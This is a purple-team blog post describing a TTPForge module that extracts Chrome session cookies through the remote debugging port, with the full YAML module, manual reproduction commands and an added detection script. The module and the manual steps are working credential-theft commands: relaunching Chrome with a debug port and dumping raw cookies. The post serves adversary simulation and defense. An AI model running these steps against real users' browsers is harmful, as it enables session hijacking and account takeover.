· Jimmy Ly · Tools · 5 min read
Extracting Cookies from Chromium Browser via Remote Debugging using TTPForge

We have created a new module in ForgeArmory for TTPForge that extracts cookies from Chromium Browser via the remote debugging port, based on the WhiteChocolateMacademiaNut tool. The new module can be found here.
TTPForge and ForgeArmory
TTPForge is a purple teaming tool created by Meta’s security teams for adversarial simulation testing. It tests behaviors from MITRE ATT&CK TTPs, similar to tools like Atomic Red Team and MITRE Caldera. TTPForge is written in Golang, which makes it OS agnostic, and it uses YAML so that new techniques are easy to read and write. Along with TTPForge, Meta’s security team has developed ForgeArmory, which hosts all supported TTP modules.
WhiteChocolateMacademiaNut
WhiteChocolateMacademiaNut is a tool created by Justin Bui, inspired by mangopdf, that exploits the remote debugging port in Chromium browsers. When a browser is launched with the remote debugging port flag, the tool interacts with the debug port to view open tabs, installed extensions, and cookies. This capability maps to MITRE ATT&CK Technique T1539 (Steal Web Session Cookie). Because it does not require root access, it is particularly useful in user contexts. This technique has proven effective in red team engagements for extracting cookies to access critical applications, gain persistence, or enable lateral movement.
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
Running the TTPForge Module
Follow the instructions on the official TTPForge page for the most up-to-date information. The new TTP module can be found here.
Assuming TTPForge is installed:
ttpforge run forgearmory//credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml
This would run extract-cookies-from-chromium-browser.yaml:
---
api_version: 2.0
uuid: 2cd87e28-d207-4cc2-9b61-644e32aeba61
name: extract-cookies-from-chromium-browser
description: Runs chromium-based browsers in debugger port and extracts cookies
requirements:
  platforms:
    - os: darwin
  superuser: false
mitre:
  tactics:
    - TA0006 Credential Access
  techniques:
    - T1539 Steal Web Session Cookie
steps:
  - name: setup
    inline: |
      # Determine the operating system
      OS=$(uname)
      if [[ "$OS" == "Darwin" ]]; then
        # Confirm that brew package manager is installed
        if ! command -v brew &> /dev/null; then
          echo "===> Error: Brew package manager is not installed on the current system. Please install to proceed."
          exit 1
        else
          echo "===> Confirmed: Brew is installed."
          # Confirm that golang utility is installed. If not, install it.
          if ! command -v go &> /dev/null; then
            echo "===> Error: Golang is not installed on the current system. Installing now."
            brew install golang
            if [ $? -ne 0 ]; then
              echo "===> Error: Failed to install Golang."
              exit 1
            fi
          else
            echo "===> Confirmed: Golang is installed."
          fi
          # Confirm that Google Chrome is installed
          if [ -d "/Applications/Google Chrome.app" ]; then
            echo "===> Confirmed: Google Chrome is installed."
          else
            echo "===> Error: Google Chrome is not installed on the current system. Installing now."
            brew install --cask google-chrome
            if [ $? -ne 0 ]; then
              echo "===> Error: Failed to install Google Chrome."
              exit 1
            fi
          fi
        fi
      else
        echo "Unsupported operating system."
        exit 27
      fi
  - name: clone-whitecocolatemacademianut
    inline: |
      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
      cd WhiteChocolateMacademiaNut
      git checkout b024f72f6350fb62853f06052a8431d20e76db7a
    cleanup:
      inline: |
        echo "Removing WhiteChocolateMacademiaNut git repository"
        rm -rf WhiteChocolateMacademiaNut
  - name: build-whitecocolatemacademianut
    inline: |
      cd WhiteChocolateMacademiaNut
      go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
      go get github.com/akamensky/argparse
      go get golang.org/x/net/websocket
      go build -o WhiteChocolateMacademiaNut
  - name: run-whitecocolatemacademianut
    inline: |
      # Determine the operating system
      OS=$(uname)
      if [[ "$OS" == "Darwin" ]]; then
        # Open Chrome
        open -a "Google Chrome" "https://www.google.com" &
        sleep 5
        # Kill Chrome Process
        killall "Google Chrome"
        # Open Chrome with remote debugger port
        "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
        sleep 5
        cd WhiteChocolateMacademiaNut
        ./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
        if [ $? -ne 0 ]; then
          echo "Failed to run WhiteChocolateMacademiaNut."
          killall "Google Chrome"
          exit 1
        else
          echo "TTP Ran Successfully"
          killall "Google Chrome"
          exit 0
        fi
      else
        echo "Unsupported operating system."
        exit 27
      fi
Steps Breakdown
- Setup: This step verifies the operating system and checks that Homebrew is installed. If Homebrew is present, it installs Golang and Google Chrome when they are missing.
- Clone WhiteChocolateMacademiaNut: This step clones the WhiteChocolateMacademiaNut repository from GitHub, specifically checking out commit b024f72f6350fb62853f06052a8431d20e76db7a. A cleanup step is also included to remove the repository after execution.
- Build WhiteChocolateMacademiaNut: Using Golang, this step builds the WhiteChocolateMacademiaNut tool to ensure compatibility with the operating system.
- Run WhiteChocolateMacademiaNut: This step simulates browser activity by opening and closing Google Chrome, then reopens it with the remote debugger port enabled on port 9222. WhiteChocolateMacademiaNut is then executed to extract cookies.
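The run step relaunches Chrome with a distinctive command line, which is what a detection for this TTP can key on. The following is an added example, not part of the original post or of TTPForge/ForgeArmory: a bash/awk filter over process-creation events. The event layout, the browser-name list and the severity heuristic are assumptions.

```bash
#!/usr/bin/env bash
# Added detection example (not from the post or the TTPForge/ForgeArmory repos).
# Assumed input: one process-creation event per line,
#   "<timestamp> <user> <pid> <full command line>"

# Constructed sample events, including the launch used by the run step.
sample_events() {
  cat <<'EOF'
2024-06-01T10:00:01Z alice 4101 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome
2024-06-01T10:00:09Z alice 4188 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/
2024-06-01T10:02:30Z ci 5120 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome --headless --remote-debugging-port=9333 --user-data-dir=/tmp/ci-profile
2024-06-01T10:03:00Z bob 5200 /usr/bin/grep -- --remote-debugging-port=9222 notes.txt
EOF
}

# Emit "<severity> <user> pid=<pid> port=<port>" for each Chromium-family
# process started with --remote-debugging-port.
detect_remote_debugging() {
  awk '
  {
    user = $2; pid = $3
    cmd = $0
    sub(/^[^ ]+ +[^ ]+ +[^ ]+ +/, "", cmd)   # drop timestamp, user, pid
    exe = cmd
    sub(/ --.*/, "", exe)                     # path up to the first switch
    # Browser binary names are an assumed allow-list; extend for your fleet.
    if (exe !~ /(Google Chrome|Chromium|Microsoft Edge|Brave Browser)$/) next
    if (!match(cmd, /--remote-debugging-port=[0-9]+/)) next
    port = substr(cmd, RSTART + 24, RLENGTH - 24)
    # Heuristic: a dedicated --user-data-dir without session restore looks like
    # test automation; anything that can reach the default profile is high.
    sev = "high"
    if (cmd ~ /--user-data-dir=/ && cmd !~ /--restore-last-session/ &&
        cmd !~ /--remote-allow-origins=/) sev = "medium"
    printf "%s %s pid=%s port=%s\n", sev, user, pid, port
  }'
}

sample_events | detect_remote_debugging
```

The grep event is ignored because the match is scoped to the executable path rather than to any command line that merely contains the switch.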
Manual Reproduction
# Assuming Homebrew is present, install Golang and Google Chrome
brew install golang
brew install --cask google-chrome
# Clone and build WhiteChocolateMacademiaNut
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
cd WhiteChocolateMacademiaNut
go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
go get github.com/akamensky/argparse
go get golang.org/x/net/websocket
go build -o WhiteChocolateMacademiaNut
# Simulate browser activity
open -a "Google Chrome" "https://www.google.com" &
killall "Google Chrome"
# Open Chrome with remote debugger port
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
# Run WhiteChocolateMacademiaNut
./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
Conclusion
TTPForge is a useful tool for verifying techniques, executing repeatable tests, and producing notable events for the TTPs. This new module demonstrates how simple it is to add new techniques that simulate realistic adversarial behavior, providing security teams with a robust method to test and improve their defenses.
MITRE ATT&CK Mapping
- Tactics:
  - TA0006 Credential Access
- Techniques:
  - T1539 Steal Web Session Cookie